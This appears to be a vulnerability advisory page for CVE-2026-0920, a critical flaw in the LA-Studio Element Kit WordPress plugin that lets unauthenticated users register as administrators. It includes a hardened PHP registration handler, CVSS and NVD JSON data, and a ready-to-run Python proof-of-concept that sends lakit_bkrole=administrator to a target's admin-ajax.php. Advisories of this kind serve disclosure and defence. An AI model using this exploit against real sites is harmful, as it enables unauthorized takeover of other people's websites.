Security Vulnerability Report
CVE-2026-0920 CVSS 9.8 CRITICAL

CVE-2026-0920

Published: 2026-01-22 07:15:51
Last Modified: 2026-04-15 00:35:42

Description

The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator access to the site.
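The defensive counterpart to the weakness described above, as an added example that is not code from the LA-Studio Element Kit plugin: a WordPress AJAX registration handler that never reads a role from the request and always assigns the site's configured default role, so a client-supplied role parameter is simply ignored (CWE-269). The function, action and nonce names (lakit_safe_register_handle, lakit_register, lakit_register_nonce) are hypothetical; the WordPress API calls (check_ajax_referer, sanitize_user, wp_insert_user, wp_send_json_error) are the real core functions.

```php
<?php
// Added example, not the plugin's own code. A hardened unauthenticated AJAX
// registration handler: the privilege level of a self-registered account is
// decided server-side and never taken from POST data.

add_action( 'wp_ajax_nopriv_lakit_register', 'lakit_safe_register_handle' ); // hypothetical action name

function lakit_safe_register_handle() {
    // Reject requests that do not carry the nonce issued with the registration form.
    check_ajax_referer( 'lakit_register_nonce', 'nonce' );

    // Honour the site-wide "Anyone can register" setting instead of bypassing it.
    if ( ! get_option( 'users_can_register' ) ) {
        wp_send_json_error( array( 'message' => 'Registration is disabled.' ), 403 );
    }

    $login = isset( $_POST['user_login'] ) ? sanitize_user( wp_unslash( $_POST['user_login'] ), true ) : '';
    $email = isset( $_POST['user_email'] ) ? sanitize_email( wp_unslash( $_POST['user_email'] ) ) : '';
    $pass  = isset( $_POST['user_password'] ) ? (string) wp_unslash( $_POST['user_password'] ) : '';

    if ( '' === $login || ! is_email( $email ) || strlen( $pass ) < 12 ) {
        wp_send_json_error( array( 'message' => 'Invalid registration data.' ), 400 );
    }

    // The role is deliberately NOT read from $_POST. Whatever role-like
    // parameter the client sends is ignored; the account gets the default role.
    $role = get_option( 'default_role', 'subscriber' );

    // Defence in depth: even the stored default must be a low-privilege role.
    // If an administrator (or a tampered option) set it to something higher,
    // refuse self-registration rather than hand out that role.
    if ( ! in_array( $role, array( 'subscriber', 'contributor' ), true ) ) {
        wp_send_json_error( array( 'message' => 'Registration unavailable.' ), 500 );
    }

    $user_id = wp_insert_user( array(
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => $pass,
        'role'       => $role,
    ) );

    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( array( 'message' => $user_id->get_error_message() ), 400 );
    }

    wp_send_json_success( array( 'user_id' => (int) $user_id ) );
}
```

The two properties that matter are that the role assigned by wp_insert_user comes from a server-side source only, and that the allowed values of that source are themselves constrained to non-privileged roles. A site that cannot update immediately should also audit its user list for unexpected administrator accounts created through the registration endpoint.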

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

LA-Studio Element Kit for Elementor <= 1.5.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import sys

# CVE-2026-0920 PoC - LA-Studio Element Kit Admin Account Creation
# Target: WordPress site with LA-Studio Element Kit plugin <= 1.5.6.3


def create_admin_account(target_url, username, email):
    """
    Exploit for CVE-2026-0920
    Creates an administrator account via the vulnerable ajax_register_handle function
    """
    # Target endpoint (typical WordPress AJAX handler)
    endpoint = target_url.rstrip('/') + '/wp-admin/admin-ajax.php'

    # Payload with lakit_bkrole parameter set to administrator
    data = {
        'action': 'ajax_register_handle',
        'lakit_bkrole': 'administrator',  # Key parameter for privilege escalation
        'user_login': username,
        'user_email': email,
        'user_password': 'P@ssw0rd123!',
        'user_password_re': 'P@ssw0rd123!'
    }

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    try:
        print(f'[*] Sending exploit request to {endpoint}')
        print(f'[*] Attempting to create admin user: {username}')

        response = requests.post(endpoint, data=data, headers=headers, timeout=30)

        if response.status_code == 200:
            print('[+] Request sent successfully')
            print(f'[*] Response: {response.text[:500]}')

            if 'success' in response.text.lower() or 'register' in response.text.lower():
                print('[+] Admin account creation may have succeeded!')
                print(f'[+] Login at: {target_url}/wp-admin/')
                return True

        print('[-] Exploit may have failed - check manually')
        return False

    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print('Usage: python cve-2026-0920.py <target_url> <username> <email>')
        print('Example: python cve-2026-0920.py http://target.com eviladmin [email protected]')
        sys.exit(1)

    create_admin_account(sys.argv[1], sys.argv[2], sys.argv[3])

References

https://plugins.trac.wordpress.org/browser/lastudio-element-kit/tags/1.5.6.3/includes/integrations/override.php#L301
https://plugins.trac.wordpress.org/changeset/3439121/lastudio-element-kit
https://www.wordfence.com/threat-intel/vulnerabilities/id/65ebc744-6cc2-47ce-b225-81820e49d59c?source=cve

Raw JSON Data

JSON

{
  "cve": {
    "id": "CVE-2026-0920",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-22T07:15:50.813",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator access to the site."
      },
      {
        "lang": "es",
        "value": "El plugin LA-Studio Element Kit para Elementor para WordPress es vulnerable a la creación de usuarios administrativos en todas las versiones hasta e incluyendo la 1.5.6.3. Esto se debe a que la función 'ajax_register_handle' no restringe con qué roles de usuario puede registrarse un usuario. Esto hace posible que atacantes no autenticados suministren el parámetro 'lakit_bkrole' durante el registro y obtengan acceso de administrador al sitio."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-269"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/lastudio-element-kit/tags/1.5.6.3/includes/integrations/override.php#L301",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3439121/lastudio-element-kit",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/65ebc744-6cc2-47ce-b225-81820e49d59c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}